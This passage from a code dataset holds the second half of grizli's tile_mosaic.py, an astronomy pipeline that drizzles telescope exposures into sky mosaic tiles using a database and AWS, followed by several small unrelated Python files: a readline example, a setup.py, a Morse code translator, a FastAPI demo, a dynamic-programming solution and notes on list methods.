{radius}>'\"\n \n res = db.execute(f\"\"\"UPDATE mosaic_tiles_exposures\n SET in_mosaic = 0\n FROM (select tile, subx, suby\n from mosaic_tiles_exposures ti, exposure_files e\n where ti.expid = e.eid\n AND polygon(e.footprint) && polygon({circle}) \n group by tile, subx, suby) subt\n WHERE mosaic_tiles_exposures.tile = subt.tile \n AND mosaic_tiles_exposures.subx = subt.subx\n AND mosaic_tiles_exposures.suby = subt.suby \n \"\"\")\n\n return res\n\n\ndef delete_empty_exposures():\n \"\"\"\n Delete exposures from tiles where exptime = 0\n \"\"\"\n SQL = f\"\"\"SELECT tile, subx, suby, filter, in_mosaic\n FROM mosaic_tiles_exposures t, exposure_files e\n WHERE t.expid = e.eid\n AND e.exptime < 1.\n \"\"\"\n res = db.SQL(SQL)\n \n if len(res) > 0:\n SQL = f\"\"\"DELETE\n FROM mosaic_tiles_exposures t\n USING exposure_files e\n WHERE t.expid = e.eid\n AND e.exptime < 1.\n \"\"\"\n \n db.execute(SQL)\n\n\ndef send_all_tiles():\n \n import time\n import os\n import numpy as np\n import matplotlib.pyplot as plt\n \n import mastquery\n \n from grizli.aws.tile_mosaic import (drizzle_tile_subregion, reset_locked,\n get_lambda_client, send_event_lambda, count_locked, tile_subregion_wcs)\n \n from grizli.aws import db\n from grizli import utils\n \n tiles = []\n \n client = get_lambda_client()\n \n nt0 = len(tiles)\n \n progs = f'AND tile != 1183 AND tile != 1392'\n progs = f'AND tile != 1183'\n progs = ''\n \n # Get with ra, dec\n if 0:\n tiles = db.SQL(f\"\"\"SELECT tile, subx, suby, count(subx),\n count(distinct(filter)) as nfilt\n FROM mosaic_tiles_exposures t, exposure_files e\n WHERE t.expid = e.eid\n {progs}\n AND filter LIKE '%%CLEAR'\n GROUP BY tile, subx, suby\n ORDER BY count(subx) ASC\n \"\"\")\n \n tiles = db.SQL(f\"\"\"SELECT tile, subx, suby, count(filter), filter,\n SUM(e.exptime) as exptime\n FROM mosaic_tiles_exposures t, exposure_files e\n WHERE t.expid = e.eid AND in_mosaic >= 0\n {progs}\n AND e.instrume in ('NIRCAM','NIRISS','MIRI')\n AND filter < 'G0'\n GROUP BY tile, subx, suby, filter\n ORDER BY count(subx) ASC\n \"\"\")\n \n tiles['ra'] = 0.\n tiles['dec'] = 0.\n tiles['footprint'] = [np.zeros((4,2))]*len(tiles)\n \n keys = np.array([f'{t} {sx} {sy}'\n for t, sx, sy in zip(tiles['tile'], tiles['subx'], tiles['suby'])])\n \n un = utils.Unique(keys, verbose=False)\n for v in tqdm(un.values):\n tile, subx, suby = np.cast[int](v.split())\n _wcs = tile_subregion_wcs(tile, subx, suby)\n ra, dec = _wcs.calc_footprint().mean(axis=0)\n tiles['ra'][un[v]] = ra\n tiles['dec'][un[v]] = dec\n tiles['footprint'][un[v]] = _wcs.calc_footprint()\n \n # Better exposure map\n point = utils.SRegion('circle(53.1, -27.8, 0.2)', wrap=False)\n filt = 'F210M-CLEAR'\n\n point = utils.SRegion('circle(3.5, -30.8, 2)', wrap=False)\n filt = 'F444W-CLEAR'\n \n coo = np.array([tiles['ra'], tiles['dec']]).T\n in_point = point.path[0].contains_points(coo)\n with_filt = in_point & (tiles['filter'] == filt)\n \n cosd = np.cos(np.median(tiles['dec'][in_point])/180*np.pi)\n \n #plt.plot(*point.xy[0].T, alpha=0.1)\n \n dx = tiles['ra'][in_point].max() - tiles['ra'][in_point].min()\n dy = tiles['dec'][in_point].max() - tiles['dec'][in_point].min()\n aspect = dy/(dx*cosd)\n \n fig, ax = plt.subplots(1,1,figsize=(5,5*aspect))\n \n ax.set_xlim(tiles['ra'][in_point].max()+0.2*dx, \n tiles['ra'][in_point].min()-0.2*dx)\n ax.set_ylim(tiles['dec'][in_point].min()-0.2*dy, \n tiles['dec'][in_point].max()+0.2*dy)\n \n ax.set_aspect(1./cosd)\n ax.grid()\n ax.set_title(filt)\n \n for f, c in zip(tiles['footprint'][with_filt], tiles['exptime'][with_filt]):\n sr = utils.SRegion(f)\n ic = np.interp(np.log10(c/3600.), [np.log10(100./3600), np.log10(20)],\n [0, 1], left=0, right=1.)\n for p in sr.get_patch(alpha=0.9, zorder=1000,\n fc=plt.cm.magma_r(ic), ec='None'):\n ax.add_patch(p)\n \n _ = mastquery.overlaps.draw_axis_labels(ax, nlabel=3)\n fig.tight_layout(pad=1.0)\n \n ### Reset EGS JWST\n if 0:\n res = db.SQL(f\"\"\"select tile, subx, suby, in_mosaic, e.filter\n from mosaic_tiles_exposures ti, exposure_files e\n where ti.tile = 2430 AND ti.expid = e.eid\n AND e.instrume in ('NIRCAM','MIRI')\n AND e.file like 'jw01345%%'\n \"\"\")\n\n res = db.execute(f\"\"\"UPDATE mosaic_tiles_exposures\n SET in_mosaic = 0\n FROM (select tile, subx, suby, expid\n from mosaic_tiles_exposures ti, exposure_files e\n where ti.expid = e.eid\n AND e.instrume in ('NIRCAM','MIRI')\n AND e.file like 'jw01345%%' AND e.filter in ('F115W-CLEAR')\n ) subt\n WHERE mosaic_tiles_exposures.tile = subt.tile \n AND mosaic_tiles_exposures.subx = subt.subx\n AND mosaic_tiles_exposures.suby = subt.suby \n AND mosaic_tiles_exposures.expid = subt.expid\n \"\"\")\n \n \n tiles = db.SQL(f\"\"\"SELECT tile, subx, suby, filter, count(filter) as count,\n min(substr(e.file,1,7)) as file0, max(substr(e.file,1,7)) as file1\n FROM mosaic_tiles_exposures t, exposure_files e\n WHERE t.expid = e.eid AND in_mosaic = 0\n {progs}\n AND filter < 'G0'\n GROUP BY tile, subx, suby, filter\n ORDER BY filter ASC\n \"\"\")\n \n if 1:\n \n # Skip all optical\n skip = (tiles['filter'] > 'F18') #& (tiles['count'] > 100)\n skip |= (tiles['filter'] < 'F18') & (tiles['count'] > 100)\n timeout = 60\n \n skip = (tiles['filter'] > 'F18') & (tiles['count'] > 100)\n skip |= (tiles['filter'] < 'F18') & (tiles['count'] > 300)\n timeout = 60\n \n tiles = tiles[~skip]\n else:\n # Randomize order for running locally\n ix = np.argsort(np.random.rand(len(tiles)))\n tiles = tiles[ix]\n timeout = 60\n \n nt1 = len(tiles)\n print(nt1, nt0-nt1)\n \n NMAX = len(tiles)\n\n istart = i = -1\n \n max_locked = 800\n \n step = max_locked - count_locked()[0]\n \n while i < NMAX-1:\n i+=1 \n # if tiles['tile'][i] == 1183:\n # continue\n \n if i-istart == step:\n istart = i\n print(f'\\n ############### \\n {time.ctime()}: Pause for {timeout} s / {step} run previously')\n time.sleep(timeout)\n \n step = np.maximum(max_locked - count_locked()[0], 1)\n print(f'{time.ctime()}: Run {step} more \\n ############## \\n')\n \n event = dict(tile=int(tiles['tile'][i]), \n subx=int(tiles['subx'][i]),\n suby=int(tiles['suby'][i]),\n filter=tiles['filter'][i], \n exposure_count=int(tiles['count'][i]),\n counter=i+2, \n time=time.ctime())\n \n if 1:\n send_event_lambda(event, client=client, func='grizli-redshift-fit')\n \n else:\n drizzle_tile_subregion(**event, \n s3output=None,\n ir_wcs=None, make_figure=False, \n skip_existing=True, verbose=True, \n gzip_output=False, clean_flt=False)\n \n files='tile.{tile:04d}.{subx:03d}.{suby:03d}.{fx}*fits'\n os.system('rm '+ files.format(fx=event['filter'].lower(), \n **event))\n \n # if (i+1) % 300 == 0:\n # break\n #time.sleep(10)\n\n ### Run locally\n tiles = db.SQL(f\"\"\"SELECT tile, subx, suby, filter, MAX(in_mosaic) as in_mosaic, count(filter)\n FROM mosaic_tiles_exposures t, exposure_files e\n WHERE t.expid = e.eid AND tile != 1183\n GROUP BY tile, subx, suby, filter\n ORDER BY (tile, filter)\n \"\"\")\n \n keep = (tiles['filter'] > 'F199') & (tiles['count'] > 100)\n utils.Unique(tiles['in_mosaic'][keep])\n \n tiles = db.SQL(f\"\"\"SELECT tile, subx, suby, filter, count(filter)\n FROM mosaic_tiles_exposures t, exposure_files e\n WHERE t.expid = e.eid AND in_mosaic = 0 AND tile != 1183\n GROUP BY tile, subx, suby, filter\n ORDER BY (tile, filter)\n \"\"\")\n\n skip = (tiles['filter'] > 'F1') & (tiles['count'] < 100)\n skip |= (tiles['filter'] < 'F1') & (tiles['count'] > 300)\n\n tiles = tiles[~skip]\n \n NMAX = len(tiles)\n\n istart = i = -1\n \n tile_filt = (0, 0)\n \n while i < NMAX:\n i+=1 \n if tiles['tile'][i] == 1183:\n continue\n \n event = dict(tile=int(tiles['tile'][i]), \n subx=int(tiles['subx'][i]),\n suby=int(tiles['suby'][i]),\n filter=tiles['filter'][i], \n counter=i, \n time=time.ctime())\n \n if (event['tile'], event['filter']) != tile_filt:\n print('Next filter, remove flc.fits')\n os.system('rm *flc.fits')\n tile_filt = (event['tile'], event['filter'])\n \n if 0:\n send_event_lambda(event, client=client, func='grizli-mosaic-tile')\n \n else:\n status = drizzle_tile_subregion(**event, \n s3output=None,\n ir_wcs=None, make_figure=False, \n clean_flt=False,\n skip_existing=True, verbose=True, \n gzip_output=False)\n \n files='tile.{tile:04d}.{subx:03d}.{suby:03d}.{fx}*fits'\n os.system('rm '+ files.format(fx=event['filter'].lower(), \n **event))\n \n \ndef get_tile_status(tile, subx, suby, filter):\n \"\"\"\n Is a tile \"locked\" with all exposures set with in_mosaic = 9?\n \"\"\"\n\n exp = db.SQL(f\"\"\"SELECT dataset, extension, assoc, filter, \n exptime, footprint, in_mosaic, detector\n FROM mosaic_tiles_exposures t, exposure_files e\n WHERE t.expid = e.eid\n AND filter='{filter}' AND tile={tile}\n AND subx={subx} AND suby={suby}\"\"\")\n \n if len(exp) == 0:\n status = 'empty'\n elif (exp['in_mosaic'] == 9).sum() == len(exp):\n status = 'locked'\n elif (exp['in_mosaic'] == 1).sum() == len(exp):\n status = 'completed'\n else:\n status = 'go'\n \n return exp, status\n\n\ndef drizzle_tile_subregion(tile=2530, subx=522, suby=461, filter='F160W', s3output=None, ir_wcs=None, make_figure=False, skip_existing=True, verbose=True, gzip_output=False, **kwargs):\n \"\"\"\n Drizzle a subtile\n \n Parameters\n ----------\n tile, subx, suby : int\n Identifiers of subtile\n \n filter : str\n Filter bandpass\n \n s3output : str\n Output S3 path, defaults to \n ``s3://grizli-mosaic-tiles/Tiles/{tile}/``\n \n ir_wcs : `~astropy.wcs.WCS`\n Override subtile WCS\n \n skip_existing : bool\n Skip if output already exists or `in_mosaic` is 0 or 9 in the \n database\n \n gzip_output : bool\n Gzip the drizzle products\n \n kwargs : dict\n Arguments passed through to `grizli.aws.visit_processor.cutout_mosaic`\n \n Returns\n -------\n status : str\n - ``skip completed`` = `tile.subx.suby.filter` has `in_mosaic = 1` \n in database\n - ``skip locked`` = `tile.subx.suby.filter` has `in_mosaic = 9` \n in database\n - ``skip empty`` = no exposures found for `tile.subx.suby.filter`\n - ``skip local`` = `tile.subx.suby.filter` found in local directory\n - ``tile.{tile}.{subx}.{suby}.{filter}`` = rootname of created file\n \n \"\"\"\n import os\n import astropy.table\n import astropy.units as u\n import astropy.wcs as pywcs\n import astropy.io.fits as pyfits\n \n import numpy as np\n from grizli import utils\n from grizli.aws import visit_processor\n \n exp, status = get_tile_status(tile, subx, suby, filter) \n \n root = f'tile.{tile:04d}.{subx:03d}.{suby:03d}'\n \n if status in ['empty']:\n if verbose:\n print(f'{root} {filter} ! No exposures found')\n \n return 'skip empty'\n \n elif status in ['locked']:\n print(f'{root} {filter} tile locked')\n return 'skip locked'\n \n elif (status in ['completed']) & (skip_existing):\n print(f'{root} {filter} tile already completed')\n return 'skip completed'\n \n sci_file = f'{root}.{filter.lower()}_drz_sci.fits'\n if skip_existing & os.path.exists(sci_file):\n print(f'Skip file {sci_file}')\n return 'skip local'\n \n # Lock\n db.execute(f\"\"\"UPDATE mosaic_tiles_exposures t\n SET in_mosaic = 9\n FROM exposure_files w\n WHERE t.expid = w.eid\n AND w.filter='{filter}' AND tile={tile}\n AND subx={subx} AND suby={suby}\"\"\")\n \n if ir_wcs is None:\n ir_wcs = tile_subregion_wcs(tile, subx, suby)\n \n if verbose:\n print(f'{root} {filter} {len(exp)}')\n \n if s3output is None:\n s3output = f's3://grizli-mosaic-tiles/Tiles/{tile}/'\n \n try:\n visit_processor.cutout_mosaic(rootname=root,\n product='{rootname}.{f}',\n ir_wcs=ir_wcs,\n res=exp, \n s3output=s3output, \n make_figure=make_figure,\n skip_existing=skip_existing,\n gzip_output=gzip_output,\n **kwargs)\n \n # Update subtile status\n db.execute(f\"\"\"UPDATE mosaic_tiles_exposures t\n SET in_mosaic = 1\n FROM exposure_files w\n WHERE t.expid = w.eid\n AND w.filter='{filter}' AND tile={tile}\n AND subx={subx} AND suby={suby}\n \"\"\")\n except TypeError:\n db.execute(f\"\"\"UPDATE mosaic_tiles_exposures t\n SET in_mosaic = 8\n FROM exposure_files w\n WHERE t.expid = w.eid\n AND w.filter='{filter}' AND tile={tile}\n AND subx={subx} AND suby={suby}\n \"\"\")\n \n status = '{root}.{f}'\n return status\n\n\ndef query_cutout(output='mos-{tile}-{filter}_{drz}', ra=189.0243001, dec=62.1966953, size=10, filters=['F160W'], theta=0, make_figure=False, make_mosaics=False, all_tiles=True, **kwargs):\n \"\"\"\n \"\"\"\n from tqdm import tqdm\n import matplotlib.pyplot as plt\n from grizli import utils\n from grizli.aws import tile_mosaic, db\n \n cosd = np.cos(dec/180*np.pi)\n rc = size/3600*np.sqrt(2)\n rtile = np.sqrt(2)*128*PIXEL_SCALE/3600\n \n SQL = f\"\"\"SELECT tile, subx, suby, subra, subdec, filter\n FROM mosaic_tiles_exposures t, exposure_files e\n WHERE in_mosaic = 1\n AND t.expid = e.eid \n AND ('((' || (subra - {ra})*{cosd} || \n ', ' || subdec - {dec} || '),\n {rtile})')::circle\n && ('((0,0),{rc})')::circle\n GROUP BY tile, subx, suby, subra, subdec, filter\"\"\"\n \n res = db.SQL(SQL) \n if len(res) == 0:\n msg = f'Nothing found for ({ra:.6f}, {dec:.6f}, {size}\")'\n return 'empty nothing found', None\n \n if filters is None:\n filters = np.unique(res['filter']).tolist()\n else:\n keep = utils.column_values_in_list(res['filter'], filters)\n res = res[keep]\n \n if len(res) == 0:\n msg = f'Nothing found for ({ra:.6f}, {dec:.6f}, {size}\") {filters}'\n return 'empty filter', None\n \n if make_figure:\n fig, ax = plt.subplots(1,1,figsize=(8,8))\n ax.scatter(res['subra'], res['subdec'], marker='x', alpha=0.)\n \n oh, ow = utils.make_wcsheader(ra=ra, dec=dec, size=size*2, \n pixscale=PIXEL_SCALE,\n theta=theta)\n \n sh = utils.SRegion(ow)\n shu = sh.union().shapely\n \n if make_figure:\n ax.add_patch(sh.get_patch(alpha=0.2, color='r')[0])\n \n res['keep'] = False\n \n iters = zip(res['tile'], res['subx'], res['suby'])\n \n keys = [res['tile'][i]*1e6+res['subx'][i]*1000+res['suby'][i]\n for i in range(len(res))]\n \n un = utils.Unique(keys, verbose=False) \n for k in un.values:\n unk = un[k]\n rk = res[unk][0]\n tw = tile_subregion_wcs(rk['tile'], rk['subx'], rk['suby'])\n sr = utils.SRegion(tw)\n isect = sr.shapely[0].intersects(shu)\n res['keep'][unk] = isect\n \n if make_figure:\n if isect:\n ec = 'b'\n fc = 'b'\n alpha=0.2\n else:\n ec = '0.8'\n fc = 'None'\n alpha=0.3\n \n ax.add_patch(sr.get_patch(alpha=alpha, fc=fc, ec=ec, zorder=-10)[0])\n \n if res['keep'].sum() == 0:\n msg = f'Nothing found for ({ra:.6f}, {dec:.6f}, {size}\") {filters}'\n return 'empty filter', None\n \n res = res[res['keep']]\n \n if make_mosaics:\n make_mosaic_from_table(res, output=output, all_tiles=all_tiles,\n **kwargs)\n \n return 'ok', res\n\n\ndef make_mosaic_from_table(tab, output='mos-{tile}-{filter}_{drz}', clean_subtiles=False, send_to_s3=False, all_tiles=True, **kwargs):\n \"\"\"\n \"\"\"\n from grizli import utils\n un = utils.Unique(tab['tile'], verbose=False)\n if all_tiles:\n tiles = un.values\n else:\n tiles = [un.values[np.argmin(un.count)]]\n \n for t in tiles:\n \n unt = tab[un[t]]\n \n xmi = unt['subx'].min()\n ymi = unt['suby'].min()\n xma = unt['subx'].max()\n yma = unt['suby'].max()\n \n filts = [f.lower() for f in np.unique(unt['filter'])]\n \n ll = (xmi, ymi)\n ur = (xma, yma)\n \n for filt in filts:\n build_mosaic_from_subregions(root=output, \n tile=t, files=None, filter=filt, \n ll=ll, ur=ur,\n clean_subtiles=clean_subtiles, \n send_to_s3=send_to_s3)\n \n if 0:\n from grizli.pipeline import auto_script\n ds9 = None\n auto_script.field_rgb(root=f'mos-{t}', HOME_PATH=None, scl=1, ds9=ds9)\n\n\ndef build_mosaic_from_subregions(root='mos-{tile}-{filter}_{drz}', tile=2530, files=None, filter='f140w', ll=None, ur=None, clean_subtiles=False, send_to_s3=False, make_weight=True):\n \"\"\"\n TBD\n \"\"\"\n import os\n from tqdm import tqdm\n import glob\n import numpy as np\n import astropy.io.fits as pyfits\n import astropy.wcs as pywcs\n from grizli import utils\n \n if 0:\n for filt in ['f105w','f140w','f160w']:\n build_mosaic_from_subregions(tile=2530, files=None, filter=filt)\n \n #tile = 2530\n #filter = 'f140w'\n \n if files is None:\n files = glob.glob(f'tile.{tile:04d}.*_dr?_sci.fits')\n files.sort()\n \n if len(files) > 0:\n tx = np.array([int(f.split('.')[2]) for f in files])\n ty = np.array([int(f.split('.')[3]) for f in files])\n \n txm, tym = tx.min(), ty.min()\n \n if ll is None:\n ll = [txm, tym]\n \n if ur is None:\n ur = [tx.max(), ty.max()]\n \n nx = ur[0] - ll[0] + 1\n ny = ur[1] - ll[1] + 1\n \n llw = tile_subregion_wcs(tile, ll[0], ll[1])\n \n MIRI_FILTERS = ['f560w','f770w','f1000w','f1280W',\n 'f1500w','f1800w', 'f2100w','f2550w']\n \n if ('clear' in filter):\n npix = 512\n llw = utils.half_pixel_scale(llw)\n drz = 'drc'\n elif (filter in MIRI_FILTERS):\n npix = 256\n drz = 'drz' \n elif (filter > 'f199') & (filter not in ['g102','g141']):\n npix = 512\n llw = utils.half_pixel_scale(llw)\n drz = 'drc'\n else:\n npix = 256\n drz = 'drz'\n \n img = np.zeros((ny*npix, nx*npix), dtype=np.float32)\n if make_weight:\n imgw = np.zeros_like(img)\n \n llh = utils.to_header(llw)\n llh['NAXIS1'] = nx*npix\n llh['NAXIS2'] = ny*npix\n llh['FILTER'] = filter.upper()\n \n ###### and check difference between opt / ir\n ###### and change drizzle params!\n \n exposures = []\n \n llh['EXPSTART'] = 1e10\n llh['EXPEND'] = 0\n \n im = None\n \n for xi in range(ll[0], ur[0]+1):\n for yi in range(ll[1], ur[1]+1):\n file = f'tile.{tile:04d}.{xi:03d}.{yi:03d}'\n file += f'.{filter}_{drz}_sci.fits'\n \n s3 = f's3://grizli-mosaic-tiles/Tiles/{tile}/'\n db.download_s3_file(s3+file, overwrite=False, verbose=False)\n \n if not os.path.exists(file):\n #print('Skip', file)\n continue\n \n print(file)\n im = pyfits.open(file)\n \n if llh['EXPSTART'] > im[0].header['EXPSTART']:\n llh['EXPSTART'] = im[0].header['EXPSTART']\n \n if llh['EXPEND'] < im[0].header['EXPEND']:\n llh['EXPEND'] = im[0].header['EXPEND']\n \n for j in range(im[0].header['NDRIZIM']):\n exp = im[0].header[f'FLT{j+1:05d}']\n if exp not in exposures:\n exposures.append(exp)\n \n slx = slice((xi-ll[0])*npix, (xi-ll[0]+1)*npix)\n sly = slice((yi-ll[1])*npix, (yi-ll[1]+1)*npix)\n img[sly, slx] += im[0].data\n \n if make_weight:\n wfile = file.replace('_sci','_wht')\n db.download_s3_file(s3+wfile, overwrite=False, verbose=False)\n if os.path.exists(wfile):\n imw = pyfits.open(wfile)\n imgw[sly, slx] += imw[0].data \n else:\n wfile = None\n \n if clean_subtiles:\n os.remove(file)\n if wfile is not None:\n os.remove(wfile)\n \n llh['NDRIZIM'] = len(exposures)\n for j, exp in enumerate(exposures):\n llh[f'FLT{j+1:05d}'] = exp\n \n if im is not None: \n for k in im[0].header:\n if (k not in llh) & (k not in ['SIMPLE','BITPIX','DATE-OBS','TIME-OBS']):\n llh[k] = im[0].header[k]\n #print(k, im[0].header[k]) \n \n # Empty\n if 'PHOTFLAM' not in llh:\n llh['PHOTFLAM'] = 0.\n llh['PHOTFNU'] = 0.\n llh['PHOTPLAM'] = 1.\n \n outfile = root.format(tile=tile, filter=filter, drz=drz) + '_sci.fits'\n pyfits.writeto(outfile, data=img, \n header=llh, overwrite=True)\n \n if make_weight:\n wfile = root.format(tile=tile, filter=filter, drz=drz) + '_wht.fits'\n pyfits.writeto(wfile, data=imgw, header=llh, overwrite=True)\n else:\n wfile = None\n \n if send_to_s3:\n db.upload_file(outfile, 'grizli-v2', object_name='Scratch/'+outfile)\n if make_weight:\n db.upload_file(wfile, 'grizli-v2', object_name='Scratch/'+wfile)\n \n return outfile, wfile\n \n #os.system(f'aws s3 cp {root}.{tile:04d}-{filter}_drz_sci.fits s3://grizli-v2/Scratch/')\n \n \n","repo_name":"gbrammer/grizli","sub_path":"grizli/aws/tile_mosaic.py","file_name":"tile_mosaic.py","file_ext":"py","file_size_in_byte":56360,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"35"} +{"seq_id":"36256541688","text":"#creat with :PyCharm\r\n#Author:Wilson\r\n#Date:2018/5/18\r\n#Time:12:14\r\n\r\n# readline()\r\nwith open(\"poem.txt\",\"r\",encoding=\"utf-8\") as f:\r\n # 只能读取一行\r\n line = f.readline()\r\n print(line)\r\n\r\n # while循环全部读出\r\n while True:\r\n line = f.readline()\r\n if not line:\r\n break\r\n print(line,end=\"\") #加end=\"\"是为了避免print自动换行,也可以删除end=\"\"看看效果","repo_name":"gains21cn/Python_study","sub_path":"文件操作/readline读取.py","file_name":"readline读取.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"33165086087","text":"from setuptools import setup, find_packages\nfrom codecs import open\nfrom os import path\nimport re\n\nhere = path.abspath(path.dirname(__file__))\nwith open(path.join(here, 'README.rst'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name='CertCenter',\n description='The official CertCenter API library',\n long_description=long_description,\n version=re.search('^__version__\\s*=\\s*\"(.*)\"', open('CertCenter.py').read(), re.M).group(1),\n url='https://github.com/CertCenter/pyCertCenter',\n author='CertCenter Development Team',\n author_email='pyCertCenter-dev@certcenter.com',\n license='MIT',\n classifiers=[\n 'Development Status :: 4 - Beta',\n\t\t'Environment :: Plugins',\n\t\t'Intended Audience :: Developers',\n 'Topic :: Security :: Cryptography',\n\t\t'License :: OSI Approved :: MIT License',\n\t\t'Operating System :: OS Independent',\n\t\t'Programming Language :: Python',\n\t\t'Topic :: Software Development :: Libraries'\n\n ],\n keywords='SSL TLS Encryption Certificates CertCenter Sockets',\n py_modules=[\"CertCenter\"]\n)\n","repo_name":"CertCenter/pyCertCenter","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"35"} +{"seq_id":"7918981511","text":"# Dictionary representing the morse code chart\nMORSE_CODE_DICT = {\n 'A': '.-', 'B': '-...', 'C': '-.-.',\n 'D': '-..', 'E': '.', 'F': '..-.',\n 'G': '--.', 'H': '....', 'I': '..',\n 'J': '.---', 'K': '-.-', 'L': '.-..',\n 'M': '--', 'N': '-.', 'O': '---',\n 'P': '.--.', 'Q': '--.-', 'R': '.-.',\n 'S': '...', 'T': '-', 'U': '..-',\n 'V': '...-', 'W': '.--', 'X': '-..-',\n 'Y': '-.--', 'Z': '--..',\n\n '0': '-----', '1': '.----', '2': '..---',\n '3': '...--', '4': '....-', '5': '.....',\n '6': '-....', '7': '--...', '8': '---..',\n '9': '----.',\n\n ', ': '--..--', '.': '.-.-.-', '?': '..--..',\n '/': '-..-.', '-': '-....-', '(': '-.--.', ')': '-.--.-'\n }\n\nENGLISH_TO_MORSE = {value: key for key, value in MORSE_CODE_DICT.items()}\n\n\ndef morse_code(encryption):\n return ' '.join(MORSE_CODE_DICT.get(char.upper()) for char in encryption)\n\n\ndef english_code(decryption):\n if decryption in ENGLISH_TO_MORSE.keys():\n return ''.join(ENGLISH_TO_MORSE.get(char) for char in decryption.split())\n else:\n return False\n\n\ndef message():\n while True:\n word = input(\"Type 'E' to encrypt morse code message or 'M' to decrypt morse code message: \").upper()\n if not (word == 'E' or word == 'M'):\n print(\"Invalid command!\\n\")\n continue\n else:\n break\n\n if word == 'E':\n word = input(\"Type your message in English: \")\n print(morse_code(word))\n\n elif word == 'M':\n while True:\n word = input(\"Type your message in morse code: \")\n phrase = english_code(word)\n if not phrase:\n phrase = 'M'\n print(\"Invalid Command!\\n\")\n\n else:\n print(phrase)\n break\n\n\nmessage()\n","repo_name":"jNembhard/MorseCode","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41997206156","text":"from enum import Enum\n\nfrom fastapi import FastAPI\n\n\nclass ModelName(str, Enum):\n alexnet = \"alexnet\"\n resnet = \"resnet\"\n lenet = \"lenet\"\n\n\napp = FastAPI()\n\n\n@app.get(\"/models/{model_name}\")\nasync def get_model(model_name: ModelName):\n if model_name == ModelName.alexnet:\n return {\"model_name\": model_name, \"message\": \"Глубокое обучение FTW!\"}\n if model_name.value == \"lenet\":\n return {\"model_name\": model_name, \"message\": \"LeCNN все изображения\"}\n return {\"model_name\": model_name, \"message\": \"Есть остатки\"}\n\n\n@app.get(\"/\")\nasync def root():\n return {\"message\": \"Hello World\"}\n\n\n@app.get(\"/items/{item_id}\")\nasync def read_item(item_id: int):\n return {\"item_id\": item_id}\n","repo_name":"tsyganno/first_project_fastapi","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"42073669292","text":"# 합 분해 (https://www.acmicpc.net/problem/2225)\n'''\n처음 봤을 때 : dp로 푸는 것 같은 느낌이 옴.. 느낌만 왔다.... ㅋㅋㅋㅋㅋㅋ 해설이 너무 수학적으로 접근해서 놀랐다..\n\nk 에 상관 없이 n이 1인 경우 경우의 수는 k개\n > k=4, n=1 이면 (0,0,0,1), (0,0,1,0), (0,1,0,0) , (1,0,0,0) 총 4개\n \nk = 1이면, n 에 상관없이 경우의 수는 1개\n\nk = 2면, 경우의 수는 n+1 개\n'''''\n\nn, k = map(int,input().split())\ngraph = [[0]*201 for _ in range(201)]\n\nfor i in range(201):\n graph[1][i] = 1\n graph[2][i] = i+1\n\nfor i in range(2,201):\n graph[i][1] = i\n for j in range(2,201):\n graph[i][j] = (graph[i-1][j] + graph[i][j-1]) % 1000000000\n\nprint(graph[k][n])\n","repo_name":"apple2062/algorithm","sub_path":"study/week10/합분해(2225).py","file_name":"합분해(2225).py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19214025082","text":"name = \"Devin\"\r\nSubject = \"Treehouse loves {}\".format(name)\r\n\r\n\"\"\" Methods for changing lists \"\"\"\r\n\r\nmy_list = [1,2,3,4,5,6,7,8,9,10]\r\nmy_list.append(11)\r\nprint(my_list)\r\n\r\nmy_list = [1,2,3]\r\nmy_list.extend([4,5,6])\r\nprint(my_list)\r\n\r\nmy_list.remove(5)\r\nprint(my_list)\r\n\r\nlist('hello')\r\nprint(list)\r\n\r\n\"\"\" Turning a list() into a String \"\"\"\r\nflavors = ['chocolate', 'mint','strawberry']\r\nprint(','.join(flavors))\r\n\r\nprint(\"My favorite flavors are: {}\".format(\", \".join(flavors)))\r\n\r\n\r\n\"\"\" This is how you split() items \"\"\"\r\navailable = \"banana split;hot fudge;cherry;malted;black and white\"\r\nsundaes = available.split(';')\r\nprint(sundaes)\r\n\r\nalpha = 'abcde'\r\nprint(alpha.index('a'))\r\nprint('abcde'.index('a'))\r\nprint(alpha.index('cd'))\r\n\r\n\"\"\" This is how you find the index \"\"\"\r\n\"\"\" Turns the string alpha into the list alpha_list \"\"\"\r\nalpha_list = list(alpha)\r\nprint(alpha_list)\r\nprint(alpha_list.index('b'))\r\n\r\nprint(alpha[0])\r\nprint(alpha_list[2])\r\n\r\nprint(alpha)\r\n\r\n\"\"\"Deleting from a list \"\"\"\r\ntrash = 99\r\ndel trash\r\nalpha_list = list('abcde')\r\ndel alpha_list[2]\r\nprint(alpha_list)\r\n\r\n\"\"\"\r\nDeleting from a String:\r\n1.) Turn the string into a list\r\n2.) delete from the list\r\n3.) turn the list back into a String\r\n\"\"\"\r\nletters = \"abcdefg\"\r\nletters_list = list(letters)\r\nprint(letters_list)\r\ndel(letters_list[6])\r\nprint(letters_list)\r\nnewletters = (' '.join(letters_list))\r\nprint(newletters)\r\n\r\n\r\n\r\n\"\"\" Splitting String into a list, that seperates by the \";\"\r\nformat a string to connect to the sundaes variable once it has been joined\r\nas a string. \"\"\"\r\navailable = \"banana split;hot fudge;cherry;malted;black and white\"\r\nsundaes = available.split(';')\r\nmenu = \"Our available flavors are: {}.\".format(\", \".join(sundaes))\r\nprint(menu)\r\n\r\n\"\"\" Using \"in\" with an \"if\" statement to search for the item in list,\r\nthen prints a statement based on the results \"\"\"\r\ndays_open = ['monday', 'tuesday', 'wednesday', 'thursday']\r\ntoday = 'tuesday'\r\nif today in days_open:\r\n print(\"Come on in!\")\r\nelse:\r\n print(\"Sorry, we're closed\")\r\n\r\n\"\"\" Most python developers prefer the method of \"not in\" \"\"\"\r\nif today not in days_open:\r\n print(\"sorry we're 